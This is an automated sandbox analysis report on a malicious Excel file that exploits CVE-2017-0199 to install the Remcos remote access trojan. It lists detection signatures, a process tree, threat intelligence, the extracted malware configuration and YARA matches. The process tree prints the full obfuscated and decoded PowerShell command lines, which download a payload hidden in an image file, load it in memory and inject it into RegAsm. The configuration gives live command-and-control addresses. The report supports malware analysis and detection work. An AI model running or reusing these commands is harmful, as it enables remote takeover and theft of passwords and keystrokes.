Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsx

Overview

General Information

Sample name:SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsx
Analysis ID:1500777
MD5:4d86c48b5d9f043b6e0b1ef3d2c7bdd4
SHA1:9206cc3a88ac7f737bdac86649905a9978443109
SHA256:33ac27d5d62b88cda7ee122abcd3209306e9527ab0b9dea5633572d8f3908bdd
Tags:xlsx
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Powershell download and load assembly
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Searches for Windows Mail specific files
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Excel Network Connections
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 3604 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WINWORD.EXE (PID: 3816 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
      • EQNEDT32.EXE (PID: 3096 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • wscript.exe (PID: 3208 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewimagesinpicturebuttersmo.vBS" MD5: 979D74799EA6C8B8167869A68DF5204A)
      • powershell.exe (PID: 3308 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?RQBO? ? ? ? ?EQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?E8? ? ? ? ?Zg? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?w? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?r? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C4? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?UwB1? ? ? ? ?GI? ? ? ? ?cwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?EM? ? ? ? ?bwBu? ? ? ? ?HY? ? ? ? ?ZQBy? ? ? ? ?HQ? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?RgBy? ? ? ? ?G8? ? ? ? ?bQBC? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FI? ? ? ? ?ZQBm? ? ? ? ?Gw? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?aQBv? ? ? ? ?G4? ? ? ? ?LgBB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?T? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?d? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?ZQBk? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQ? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?bgBs? ? ? ? ?Gk? ? ? ? ?Yg? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?Tw? ? ? ? ?u? ? ? ? ?Eg? ? ? ? ?bwBt? ? ? ? ?GU? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bt? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BN? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?VgBB? ? ? ? ?Ek? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?HY? ? ? ? ?bwBr? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?G4? ? ? ? ?dQBs? ? ? ? ?Gw? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?bwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?WwBd? ? ? ? ?F0? ? ? ? ?I? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?d? ? ? ? ?B4? ? ? ? ?HQ? ? ? ? ?LgBW? ? ? ? ?Ec? ? ? ? ?RwBS? ? ? ? ?C8? ? ? ? ?M? ? ? ? ?? ? ? ? ?w? ? ? ? ?DY? ? ? ? ?Lw? ? ? ? ?4? ? ? ? ?DI? ? ? ? ?Mg? ? ? ? ?u? ? ? ? ?DE? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?DI? ? ? ? ?MQ? ? ? ? ?u? ? ? ? ?Dg? ? ? ? ?OQ? ? ? ? ?x? ? ? ? ?C8? ? ? ? ?Lw? ? ? ? ?6? ? ? ? ?H? ? ? ? ?? ? ? ? ?d? ? ? ? ?B0? ? ? ? ?Gg? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?UgBl? ? ? ? ?Gc? ? ? ? ?QQBz? ? ? ? ?G0? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ck? ? ? ? ?';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • powershell.exe (PID: 2900 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VGGR/006/822.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • RegAsm.exe (PID: 3060 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
          • RegAsm.exe (PID: 2496 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
            • RegAsm.exe (PID: 1908 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bxivncg" MD5: 8FE9545E9F72E460723F484C304314AD)
            • RegAsm.exe (PID: 2580 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\drnnovqcfns" MD5: 8FE9545E9F72E460723F484C304314AD)
            • RegAsm.exe (PID: 3052 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nttgonbetvkaco" MD5: 8FE9545E9F72E460723F484C304314AD)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "192.3.101.172:2404:1192.3.101.172:9674:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-4CT19T", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sreemanganshekumarsayingbuttersmoothbunneverhandlingthesweetmilkbunwhichreallytastywithbuttersmooththings_________getitsbacktotheroadwith[1].docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0xc09:$obj2: \objdata
  • 0xbf3:$obj3: \objupdate
  • 0xbcf:$obj4: \objemb
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F9C7AC5D.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0xc09:$obj2: \objdata
  • 0xbf3:$obj3: \objupdate
  • 0xbcf:$obj4: \objemb

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.1041669292.0000000000315000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    0000000E.00000002.1041669292.0000000000331000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
